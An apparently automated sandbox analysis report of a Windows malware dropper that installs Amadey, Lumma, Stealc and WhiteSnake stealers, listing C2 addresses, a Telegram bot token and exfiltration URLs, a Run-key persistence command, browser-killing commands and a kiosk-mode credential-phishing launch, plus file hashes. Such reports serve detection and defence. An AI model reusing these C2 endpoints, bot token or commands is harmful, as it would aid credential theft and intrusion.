Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-12-2024 02:08

General

  • Target

    16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe

  • Size

    1.8MB

  • MD5

    7b92d16653d665a34de4c92d58e583df

  • SHA1

    3023e4305423e69cabf82b2e0ba20d87cf67cd85

  • SHA256

    16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12

  • SHA512

    6efb2fa816fe7bb92e91233756781ffed7d72594d4ae927e0ea3fcb61744e9bd7dfe626c6e64445d0797815748765032b44d9ab1a3c6f22e46dd86cda5098a03

  • SSDEEP

    24576:GiZI3q/ZYhTUvu4XYCK7mqtpvp8GPlAdD/9zmt26WeQcEcPH8GLMOMGEP0dH:G0IqwUVXN+8GPap9iOrGLJM/Pm

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://ratiomun.cyou

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://ratiomun.cyou/api

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendMessage?chat_id=7538374929

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/getUpdates?offset=-

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Milleniumrat family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe
    "C:\Users\Admin\AppData\Local\Temp\16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4532
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4012
      • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
        "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1596
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1584
          4⤵
          • Program crash
          PID:1988
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1560
          4⤵
          • Program crash
          PID:4932
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1524
          4⤵
          • Program crash
          PID:1040
      • C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe
        "C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpFFFB.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpFFFB.tmp.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:816
          • C:\Windows\system32\chcp.com
            chcp 65001
            5⤵
              PID:1132
            • C:\Windows\system32\tasklist.exe
              Tasklist /fi "PID eq 400"
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3048
            • C:\Windows\system32\find.exe
              find ":"
              5⤵
                PID:3160
              • C:\Windows\system32\timeout.exe
                Timeout /T 1 /Nobreak
                5⤵
                • Delays execution with timeout.exe
                PID:1512
              • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2332
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3096
                  • C:\Windows\system32\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                    7⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:4712
          • C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
            "C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1288
          • C:\Users\Admin\AppData\Local\Temp\1012208001\6284ef5aab.exe
            "C:\Users\Admin\AppData\Local\Temp\1012208001\6284ef5aab.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1584
          • C:\Users\Admin\AppData\Local\Temp\1012209001\d235088e23.exe
            "C:\Users\Admin\AppData\Local\Temp\1012209001\d235088e23.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1920
          • C:\Users\Admin\AppData\Local\Temp\1012210001\30e19168b2.exe
            "C:\Users\Admin\AppData\Local\Temp\1012210001\30e19168b2.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            PID:1540
          • C:\Users\Admin\AppData\Local\Temp\1012211001\9e7a56c139.exe
            "C:\Users\Admin\AppData\Local\Temp\1012211001\9e7a56c139.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3180
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              4⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3148
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              4⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2216
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              4⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1064
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              4⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1832
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              4⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1828
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3172
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                5⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of SetWindowsHookEx
                PID:3736
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fab8d6a7-14cd-4bfe-b988-c85750dc6bd8} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" gpu
                  6⤵
                    PID:4788
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {beb97e41-0673-4405-bbd8-ee04875ea39e} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" socket
                    6⤵
                      PID:3728
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 2836 -prefMapHandle 3176 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e4b1c85-6e52-4592-9521-e245098c5075} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab
                      6⤵
                        PID:4124
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3920 -childID 2 -isForBrowser -prefsHandle 3912 -prefMapHandle 3828 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97eb77ad-b665-4e88-a54f-cc495a65030b} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab
                        6⤵
                          PID:4960
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2776 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4652 -prefMapHandle 2768 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56323263-91c1-4987-93cd-46498dea3a2d} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" utility
                          6⤵
                          • Checks processor information in registry
                          PID:3868
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5436 -childID 3 -isForBrowser -prefsHandle 5588 -prefMapHandle 5584 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80f1b825-8087-482a-b5cb-503ea4e45225} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab
                          6⤵
                            PID:5204
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 4 -isForBrowser -prefsHandle 5728 -prefMapHandle 5732 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a74226d0-c621-4f54-90e3-05ebb2465a8f} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab
                            6⤵
                              PID:5312
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5276 -childID 5 -isForBrowser -prefsHandle 5864 -prefMapHandle 5868 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2509572-581a-419e-9806-5217a4b9225a} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab
                              6⤵
                                PID:5320
                        • C:\Users\Admin\AppData\Local\Temp\1012212001\0fba2c100f.exe
                          "C:\Users\Admin\AppData\Local\Temp\1012212001\0fba2c100f.exe"
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1000
                        • C:\Users\Admin\AppData\Local\Temp\1012213001\40673ab59a.exe
                          "C:\Users\Admin\AppData\Local\Temp\1012213001\40673ab59a.exe"
                          3⤵
                          • Enumerates VirtualBox registry keys
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          PID:5936
                        • C:\Users\Admin\AppData\Local\Temp\1012214001\rhnew.exe
                          "C:\Users\Admin\AppData\Local\Temp\1012214001\rhnew.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          PID:5920
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 1556
                            4⤵
                            • Program crash
                            PID:5632
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1596 -ip 1596
                      1⤵
                        PID:4152
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1596 -ip 1596
                        1⤵
                          PID:3540
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1596 -ip 1596
                          1⤵
                            PID:1468
                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                            C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                            1⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3852
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5920 -ip 5920
                            1⤵
                              PID:5452
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:6112

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\WQOY74U4\download[1].htm

                              Filesize

                              1B

                              MD5

                              cfcd208495d565ef66e7dff9f98764da

                              SHA1

                              b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                              SHA256

                              5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                              SHA512

                              31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\activity-stream.discovery_stream.json

                              Filesize

                              27KB

                              MD5

                              ff049567661401e60903a4b58f59f245

                              SHA1

                              78c5d4f62b6fbb39cd9aa1319e2e55abbe672eba

                              SHA256

                              35ed85ebd7ace4eeca074671583cf0b5f6134590e7ce816bb0c93a8e344dc71c

                              SHA512

                              ebaed10cb12160432ebe7f4bbe1c4048d185ecaad105fe2258854cbb7c17375e25a6b441336e76be0c72fee041ffe9c75047c9a27c7d3ade31923cb5b035012b

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                              Filesize

                              13KB

                              MD5

                              6d574a42102d7270db089684591f5206

                              SHA1

                              5e31557f4cdb4dc8fcf01136449d420e59c9e584

                              SHA256

                              5fcad3087cf28cf8ab37d61a6b6102a162f0017cf33c562256a9848e1ea2abcc

                              SHA512

                              4688c01c1cf472cec1ae6f4c27af817331738b8292876d7110c6760dcd514e2c1a28f2c917df511eeec52927f589665b1a1612cb68a78765cf2f842339f557f1

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                              Filesize

                              15KB

                              MD5

                              96c542dec016d9ec1ecc4dddfcbaac66

                              SHA1

                              6199f7648bb744efa58acf7b96fee85d938389e4

                              SHA256

                              7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                              SHA512

                              cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                            • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe

                              Filesize

                              1.8MB

                              MD5

                              5fa72774e9d750628857a68d84275833

                              SHA1

                              7eebff7d14817544cc11829e354c1dfc7f603628

                              SHA256

                              a170fa6fefc8b753ef0f88384b906ca2338365d8552012ed7aa1c0c8c7cb5a56

                              SHA512

                              9ac2715f35e107effef9f4526e6430271ca141bc5a729993e88dfa50eb20f61b15502c54f64e9596cd9bb449a1bb25c1cc98f1d12d857afdda742cdce3280838

                            • C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe

                              Filesize

                              5.6MB

                              MD5

                              23b25ce90f70ffa0435db8df6a6764f2

                              SHA1

                              72d0c052f26309704f13c090495c3cdea4ed1bf2

                              SHA256

                              9165705656ffe7608922ff366357e3b98b0e5ece8c6d39780874c7b4bd7b2dd3

                              SHA512

                              b6c81131119b95df9d789329ffd4553c1624f7d9e38c46924ac4838e59ccb59b538646f36d8c80b9361412842f8c0328aa4177e93e72e22c15077669ee9904ec

                            • C:\Users\Admin\AppData\Local\Temp\1012041001\e6dA9xd.exe

                              Filesize

                              612B

                              MD5

                              e3eb0a1df437f3f97a64aca5952c8ea0

                              SHA1

                              7dd71afcfb14e105e80b0c0d7fce370a28a41f0a

                              SHA256

                              38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521

                              SHA512

                              43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

                            • C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

                              Filesize

                              1.7MB

                              MD5

                              ff4cf493ac5f7663d1cfc243e6646eb7

                              SHA1

                              ff7184eae695580f1e86fac340925c7f01f4de6d

                              SHA256

                              72a99a945b705fc1c8fa59c3db6810be2aadeaecc34f954f5ab314574002d748

                              SHA512

                              1eef407d5bfa8b94bb98cb0a64e7c73cb94176507fa924642c6cf21192965ba8856390214379fddf192b88e19377768ead94fb4d393831e47ca230b6b168f14b

                            • C:\Users\Admin\AppData\Local\Temp\1012208001\6284ef5aab.exe

                              Filesize

                              1.8MB

                              MD5

                              06b66556e8a2389c099c0da6e0db3dd2

                              SHA1

                              53f96909c6ae94499b790eba12ec355a275388df

                              SHA256

                              ccd13fcd2302d16a0fd2d9cc2653869ce0551d464145bf264f75163f03f874bc

                              SHA512

                              8623c835b552b000749405788eba8cc221f505d5285ff5fe8c5d79d81ae5d9a18985427e1f98c4baf2defd38ece14af11683524de636612d69d9b913a6869ce5

                            • C:\Users\Admin\AppData\Local\Temp\1012209001\d235088e23.exe

                              Filesize

                              1.8MB

                              MD5

                              b12e16778fc59591c0be9a05f177bdae

                              SHA1

                              3809bacf7fa357579a7d0f81d036d7fc5e482dd6

                              SHA256

                              675290c045ad958ec71e15c3134b41c1e4aa8be8475b4ad46b8d4a323936d750

                              SHA512

                              362f2f7121cd21ecc4fc590dca11a70cc8ba7633d36d1b38fffc6a1cb9d4ad06ea9aa1c7984853bd49e9116d53e6db39aedd741f14335e587e8dce87cfa236bf

                            • C:\Users\Admin\AppData\Local\Temp\1012210001\30e19168b2.exe

                              Filesize

                              1.7MB

                              MD5

                              da71401999308f3006e292a28a953516

                              SHA1

                              9a8470f97760506d8fe83c0e0398f9b37c857b2f

                              SHA256

                              e1bdbadb3c03238af26c510775bb0aa63f7221dd43eb6f02a16332e091718779

                              SHA512

                              4fd76deffcca140a1d1138386b1f2b87853686660b4ff4c17e80505ecec1f6742c552636a17bdfc3a3aef24d359c376dfef13c14dd0005bc94d1f521e3aa7df4

                            • C:\Users\Admin\AppData\Local\Temp\1012211001\9e7a56c139.exe

                              Filesize

                              948KB

                              MD5

                              a1c0ae9c47dfa39f9f4ecb25a8ed6df3

                              SHA1

                              62a0861c8a57f4afcd49d4db7ad3a46897b10e1e

                              SHA256

                              200baf4c343c7bee6e39a39097fda685d33ba525ee1d7045ccafb97b3a22d1a7

                              SHA512

                              9f13e3774584e6af8cfc7788befc49715bbda6050b1df8675eb8e9b648f38a3a463760f691a6ff639542e5e70d8406f8060d86636e85d596cd883fbc2f614879

                            • C:\Users\Admin\AppData\Local\Temp\1012212001\0fba2c100f.exe

                              Filesize

                              2.6MB

                              MD5

                              6497aafc301bd0c3313acb178dd5b328

                              SHA1

                              5d13e25e93ed6b09b8d9ee87449915b7b5352ec3

                              SHA256

                              fe5929f96b7aa3c446141156ec7456d560a7a8b576d55bc7fbbd6b4c1201cf8a

                              SHA512

                              39080221d3740f629691c11174debd1cbeaa4fbafc1bd912b9ecdea9079cf3e8a24e9fecb34c7533e89c3258bc37079f635b665714dc92d2a7e28ad3cda74745

                            • C:\Users\Admin\AppData\Local\Temp\1012213001\40673ab59a.exe

                              Filesize

                              4.2MB

                              MD5

                              88bf63a8e16a403ede877c51371debe2

                              SHA1

                              04dfbf773b963149cfbe1787bae7a3c8a5bd1f34

                              SHA256

                              6da015a4d07aaa513f90f351e52f6789345826bf255e5ea616b2bfded6ed4477

                              SHA512

                              886629e4f4d041cba51659885ad27451f4103cf1c556de21439b52b362b6f03a046b1c245a6b2259d6726fbf9db9f0ea1fee72dde86303fe7aec8a597dd6da9f

                            • C:\Users\Admin\AppData\Local\Temp\1012214001\rhnew.exe

                              Filesize

                              1.8MB

                              MD5

                              f7286fef9317fe91e24cda721ec0be81

                              SHA1

                              0e0197c0f87200f7c1ebb4bba314f7bb875a638c

                              SHA256

                              4dcf1cc20990dace1f3e7c5a4b94ea7b823f90eb6de639b2b1b6494838f1cc62

                              SHA512

                              314b3f5cf1a0c15db568d33647b97887b37e987ba253ee9f5ded045446328307ebd04acd832fbdf66ad29be9510bd0c378e2fcb889509dca84df9b9106602c6e

                            • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

                              Filesize

                              1.7MB

                              MD5

                              65ccd6ecb99899083d43f7c24eb8f869

                              SHA1

                              27037a9470cc5ed177c0b6688495f3a51996a023

                              SHA256

                              aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

                              SHA512

                              533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                              Filesize

                              1.8MB

                              MD5

                              7b92d16653d665a34de4c92d58e583df

                              SHA1

                              3023e4305423e69cabf82b2e0ba20d87cf67cd85

                              SHA256

                              16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12

                              SHA512

